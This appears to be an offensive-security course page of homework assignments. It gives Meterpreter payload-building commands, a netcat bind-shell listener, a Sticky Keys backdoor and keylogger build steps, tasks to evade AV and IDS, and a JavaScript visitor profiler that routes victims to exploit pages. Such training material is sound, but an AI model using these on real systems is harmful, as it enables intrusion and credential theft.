• Slides


Required Reading

CPAU is an administration tool that lets a lower-privileged user run a process with higher rights. It does this by embedding the higher-privileged credentials, together with the command to run, inside a job file. This poorly designed application is widely deployed in corporations, so a penetration tester may well encounter it after gaining access to a corporate desktop. Reverse engineer the isis-cmd.job file and extract the elevated credentials it contains.

Required Reading


General References

Finding Web Malware Samples

Reversing Web Malware

Developing Persistence Tools

Meterpreter Documentation

If the Meterpreter API doesn't natively do what you want, try uploading and executing one of Nirsoft's utilities (standalone Windows password-recovery and system-information tools that run without an installer).

You don't have to exploit anything to get a Meterpreter session running. You can bundle Meterpreter into a standalone executable that the target double-clicks, using the following msfpayload and msfcli commands. Note that the payload used here is bind_tcp: the executable listens on port 4444 on the target and your handler connects to it, so RHOST must be set to the target's address (if the target is behind NAT, use reverse_tcp instead and set LHOST to your own address).

create payload:

  • ./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > meterpreter.exe

to connect to the waiting payload:

  • ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST= LPORT=4444 E

msfpayload and msfcli were removed from Metasploit in 2015. The current equivalents are msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o meterpreter.exe and msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST <target>; set LPORT 4444; run".


Fall 2010

The homework for client-side exploitation was split into two parts:

1. Profile a department at Poly for a client-side attack

  • What intelligence would you gather and why?
  • Based on the information you gathered, develop a scenario to successfully execute a client-side attack

2. Plugin Detection

  • Create a webpage to detect browser version, 3rd-party apps, ActiveX CLSIDs, etc.
  • Consider cross-browser functionality
  • Deliver a unique page based on browser/OS

Extra Credit: If you did Dino's ActiveX exploitation midterm question, convert your exploit to a Metasploit module. If you didn't do it, do it any way you can.

The xspy keylogger was discussed in the post-exploitation class. Compile xspy for your machine and run it locally, then try running "su -", running sudo, and locking and unlocking your screen. Did it capture your password? (xspy works by polling the X server's keyboard state with XQueryKeymap rather than registering for key events, which is why it is worth testing against programs that grab the keyboard, such as a screen locker.)

Compilation instructions (verify the download against the md5sum output given in class, then build; xmkmf generates the Makefile from the Imakefile and needs imake and the X11 development headers installed):

7cc26e0ea6eea9452f5f5f87afcce595 xspy-1.0c.tgz
tar -zxvf xspy-1.0c.tgz
cd xspy
xmkmf
make

If the build fails because NULL is undeclared in usleep.c, add the following lines to it:

#ifndef NULL
#define NULL (void *)0
#endif //#ifndef NULL

The homework for the post-exploitation class was to write a persistence script for Windows or Linux that uses two forms of persistence: one that keeps user-level access and one that gives you a way to escalate privileges again later. For Windows, the script must be written in VB or PowerShell. For Linux, the script can be written in Bash, Perl, Python or Ruby.

For example, on Windows you could:

  • Change the password for Guest and re-enable the account for login
  • Create a vulnerable service (for example one whose binary is writable by an unprivileged user) so that you can escalate privileges later
  • Create a new user
  • Move sethc.exe to sethc.exe.bk and copy cmd.exe to sethc.exe (the Sticky Keys backdoor: pressing Shift five times at the logon screen then opens a SYSTEM shell; replacing files under System32 requires taking ownership of them first)

On Linux, you could:

  • Install SSH keys into a user's ~/.ssh/authorized_keys
  • Install a setuid-root binary, or make an existing binary setuid root
  • Add "." to the front of the user's PATH and put a trojan sudo in their home directory (it is only picked up when sudo is run from that directory, and only if "." comes before /usr/bin in PATH)
  • Install a version of netcat compiled with the "-e gaping security hole" option enabled and start it listening with "nc -l 666 -e /bin/bash" (older netcat-traditional builds need "nc -l -p 666 -e /bin/bash"; the OpenBSD netcat shipped by most distributions has no -e at all)

Fall 2009

Students had three choices for their homework in the client-side exploitation section.

Option 1: Plugin Detection

  • Create a webpage that detects browser version, 3rd-party apps, ActiveX class IDs, etc.
  • Consider cross-browser functionality
  • Deliver an exploit or a unique page based on the collected information
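The following is an added example for the plugin-detection assignments (Fall 2010 part 2 and Fall 2009 Option 1; the same profile is what a Fall 2008 phishing landing page would collect). It is not code from the course and not a submitted solution. It parses the User-Agent for browser and OS, walks navigator.plugins for non-IE browsers, probes ActiveX controls by ProgID in IE (where navigator.plugins is empty), and routes the visitor to a page chosen from the profile. The navigator object and the ActiveXObject constructor are injected so the logic runs outside a browser; the sample visitors at the bottom are constructed, the ProgID list is illustrative, and the page names returned by choosePage are placeholders.

```javascript
// Added example (not course code): client-side profiling for plugin detection.
// Everything is injectable (navigator object, ActiveXObject constructor) so the
// logic can be exercised under node with the constructed samples below.

// Order matters: Edge and Chrome UAs also contain "Safari"; IE11 has "Trident"
// and "rv:" but no "MSIE"; Firefox has "rv:" but no "Trident".
const BROWSER_PATTERNS = [
  { name: 'IE',      re: /MSIE ([\d.]+)/ },
  { name: 'IE',      re: /Trident\/[\d.]+.*rv:([\d.]+)/ },
  { name: 'Edge',    re: /Edge?\/([\d.]+)/ },
  { name: 'Firefox', re: /Firefox\/([\d.]+)/ },
  { name: 'Chrome',  re: /Chrome\/([\d.]+)/ },
  { name: 'Safari',  re: /Version\/([\d.]+).*Safari/ },
];
// iOS before macOS: iPhone/iPad UAs contain "like Mac OS X".
const OS_PATTERNS = [
  { name: 'Windows', re: /Windows NT ([\d.]+)/ },
  { name: 'iOS',     re: /(?:iPhone|iPad).*OS ([\d_]+)/ },
  { name: 'macOS',   re: /Mac OS X ([\d_.]+)/ },
  { name: 'Android', re: /Android ([\d.]+)/ },
  { name: 'Linux',   re: /Linux/ },
];

function firstMatch(ua, patterns) {
  for (const p of patterns) {
    const m = ua.match(p.re);
    if (m) return { name: p.name, version: m[1] ? m[1].replace(/_/g, '.') : null };
  }
  return { name: 'unknown', version: null };
}

function parseUserAgent(ua) {
  const b = firstMatch(ua, BROWSER_PATTERNS);
  const o = firstMatch(ua, OS_PATTERNS);
  return { browser: b.name, browserVersion: b.version, os: o.name, osVersion: o.version };
}

// navigator.plugins is array-like; the version usually only appears in the
// free-text description (e.g. 'Shockwave Flash 10.1 r85').
function listPlugins(nav) {
  const out = [];
  const plugins = nav.plugins || [];
  for (let i = 0; i < plugins.length; i++) {
    const p = plugins[i];
    const m = (p.description || '').match(/(\d+(?:\.\d+)+)/);
    out.push({ name: p.name, filename: p.filename, version: m ? m[1] : null });
  }
  return out;
}

// IE leaves navigator.plugins empty; installed controls are found by trying to
// instantiate them. ProgIDs here are illustrative; a CLSID is probed the same
// way by inserting <object classid="clsid:..."> and checking the element.
const ACTIVEX_PROBES = [
  { label: 'Adobe Reader',         progId: 'AcroPDF.PDF' },
  { label: 'Flash',                progId: 'ShockwaveFlash.ShockwaveFlash' },
  { label: 'Java',                 progId: 'JavaWebStart.isInstalled' },
  { label: 'Windows Media Player', progId: 'WMPlayer.OCX' },
  { label: 'MDAC RDS.DataSpace',   progId: 'RDS.DataSpace' },
];

function probeActiveX(ctor, probes) {
  const found = {};
  if (!ctor) return found;                        // not IE: nothing to probe
  for (const p of probes) {
    try { new ctor(p.progId); found[p.label] = true; }
    catch (e) { found[p.label] = false; }         // "Automation server can't create object"
  }
  return found;
}

function buildProfile(nav, activeXCtor) {
  return Object.assign(parseUserAgent(nav.userAgent || ''), {
    plugins: listPlugins(nav),
    activex: probeActiveX(activeXCtor, ACTIVEX_PROBES),
  });
}

// Route on the profile (page names are placeholders). Unprofiled visitors get
// the benign page so exploits are not handed to crawlers and analysts.
function choosePage(profile) {
  if (profile.browser === 'IE' && profile.activex['MDAC RDS.DataSpace']) return 'ie_mdac.html';
  const hasReader = profile.activex['Adobe Reader'] ||
    profile.plugins.some(p => /Adobe (Acrobat|Reader)/i.test(p.name));
  if (hasReader) return 'pdf.html';
  return 'benign.html';
}

// Constructed sample visitors (not captured data) for running outside a browser.
const SAMPLE_FIREFOX = {
  userAgent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12',
  plugins: [
    { name: 'Adobe Acrobat', filename: 'nppdf32.dll', description: 'Adobe PDF Plug-In For Firefox and Netscape "9.4.0"' },
    { name: 'Shockwave Flash', filename: 'NPSWF32.dll', description: 'Shockwave Flash 10.1 r85' },
  ],
};
const SAMPLE_IE7 = {
  userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)',
  plugins: [],
};
// Stand-in for IE's ActiveXObject: succeeds only for the ProgIDs "installed".
function fakeActiveX(installed) {
  return function (progId) {
    if (installed.indexOf(progId) === -1) throw new Error("Automation server can't create object");
  };
}

// In a real landing page: profile the visitor, report home, then redirect.
if (typeof document !== 'undefined' && typeof navigator !== 'undefined') {
  const profile = buildProfile(navigator, typeof ActiveXObject !== 'undefined' ? ActiveXObject : null);
  new Image().src = '/collect?p=' + encodeURIComponent(JSON.stringify(profile));
  window.location.href = choosePage(profile);
}
```

The UA-derived fields are only hints (the header is trivially spoofed and proxies rewrite it); the plugin and ActiveX probes are what actually tell you which exploit will fire, which is why the routing in choosePage prefers them over the parsed browser name.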

Option 2: Create and obfuscate MDAC RDS exploit code

  • Try to bypass a network IDS; consider what the signatures are triggering on
  • Code sample available (check the presentation, milw0rm, or ask Dean)

Option 3: Malicious PDF

  • Encode/obfuscate a malicious PDF so that it bypasses AV on a host, and test the PDF against VirusTotal. The PDF must remain functional (it still has to launch calc.exe). Bear in mind that VirusTotal shares uploaded samples with AV vendors, so a sample submitted there will not stay undetected for long.
  • Code sample available (ask Dean)

The homework for the post-exploitation section was to write a Meterpreter script providing functionality that did not already exist.

Fall 2008

Students had two choices for their homework in the client-side exploitation section.

Option 1: Run a Phishing Campaign

  • 1a. Intelligence Gathering
    • Find all e-mail addresses for
    • Find any other domains, URLs, or other information that can be used to improve the phish's chance of success
    • Describe the methods, tools and scripts used for this step
  • 1b. Target
    • Develop an e-mail (create a scenario) and link it to a malicious site that you create
    • At your landing page, gather the following information: remote IP, plugins, browser, etc.
    • If possible, drop and execute a file on the target

Option 2: Analyze a web-based malware sample

  • Decode the JavaScript and describe its obfuscation techniques
  • Describe what it does, what bug it exploits, how, etc.
  • Modify the code so that the payload is your own payload.exe

The homework for the post-exploitation section was to write a Meterpreter script providing functionality that did not already exist.